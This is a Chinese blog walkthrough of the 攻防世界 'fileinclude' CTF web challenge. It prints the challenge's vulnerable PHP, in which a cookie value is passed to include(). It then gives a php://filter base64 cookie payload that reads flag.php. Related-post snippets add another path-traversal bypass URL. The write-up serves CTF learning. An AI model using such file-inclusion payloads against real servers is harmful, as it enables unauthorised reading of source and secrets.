攻防世界(CTF)~web-fileinclude

最新推荐文章于 2024-07-21 12:31:29 发布
最新推荐文章于 2024-07-21 12:31:29 发布
阅读量586 收藏 9
点赞数 8
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75030189/article/details/138027557
版权

题目介绍

这题主要使用php伪协议来解

php://filter  是一个可以在 PHP 中进行数据过滤和流处理的协议。

什么是php伪协议?

题目主页告诉我们了一个目录和flag就在flag.php里面

先打开源码看一下有没有什么信息

发现一段php代码,我们来审计一下

<?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{
	@setcookie("language","english");
	@include("english.php");
}
else
{
	@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>

第五行

$lan = $_COOKIE['language'];

第十四行

@include($lan.".php");

在cookie中的内容language 会被传到变量$lan,然后在@include($lan.".php")被调用与执行,同时拼接上.php,所以我们在构造payload的时候后面不需要在加上后缀。

payload

Cookie:language=php://filter/convert.base64-encode/resource=/var/www/html/flag

操作演示(方法一:hackbar)

base64解码工具直接解码得到flag

操作演示(方法二:brupsuit)

选中内容鼠标右击放到Decoder模块去解密

flag="cyberpeace{f32bb194c8b8cbb2e97d27f0f6b179e4}

sea~gull
关注
专栏目录
网络安全 | CTF攻防世界 fileinclude详析(php伪协议)
等风来
07-31 4308
由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。因此解思路为:利用php伪协议,构造language参数,来读取该目录下的flag.php文件。,即此处存在文件包含。
网络安全 | CTF攻防世界 file_include详析(php伪协议+convert转换过滤器)
等风来
07-31 5033
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?目描述:怎么读取文件呢?对于本,将初始POC。
攻防世界file_include
小缪的博客
06-10 2977
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-web-file_include
MateSnake的博客
05-12 553
攻防世界-web-file_include
攻防世界-fileinclude
最新发布
2301_79858466的博客
07-21 1064
💡 convert.base64-encode/convert.base64-decode是转换过滤器属于read的参数,💡 相当于base64_encode()和 base64_decode(),作用是base64 编码解码。💡 read= 该参数可选。可以设定一个或多个过滤器名称,以 管道符(|)分隔。两个链的过滤器> 任何没有以 read= 或 write= 作前缀的筛选器列表会视情。💡 resource= 必须项。💡 write= 该参数可选。
攻防世界WEB练习-fileinclude
不知名白帽的博客
08-31 6778
攻防世界WEB练习-fileinclude
file_include(攻防世界)
m0_56107268的博客
11-14 7667
php转化器的学习
攻防世界file_include
m0_74979597的博客
09-13 1775
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
网络安全 | CTF攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
是 PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
[CTF目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7740
[CTF目总结-web篇]攻防世界-warmup
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 499
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界---fileinclude
m0_72447684的博客
10-11 1240
攻防世界---fileinclude
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3369
攻防世界 -- fileinclude
攻防世界 fileinclude
qq_73861475的博客
05-20 528
因为变量是用cookie传参的,所以我们构造的playload是关于cookie的,在bp里面将cookie更改为我们构造的,最后就会得到。红线圈出来的就是flag的base64编码值,所以我们要将红线圈出来的值进行base64解码就会得到flag。include函数用php://filter伪协议来绕过。我们可以看这个页面知道flag在flag.php这个文件中,而且还有文件路径为。首先打开目进入环境,在此之前目没有太多提示。传参,所以我们要改cookie的值。可以用于读取、写入文件等函数。
攻防世界fileinclude
……
09-13 7705
攻防世界文件包含
攻防世界-web-fileinclude
MateSnake的博客
05-11 380
攻防世界-web-fileinclude
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1940
主要是这个目的解过程和原理,可以帮助大家学习文件包含漏洞
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值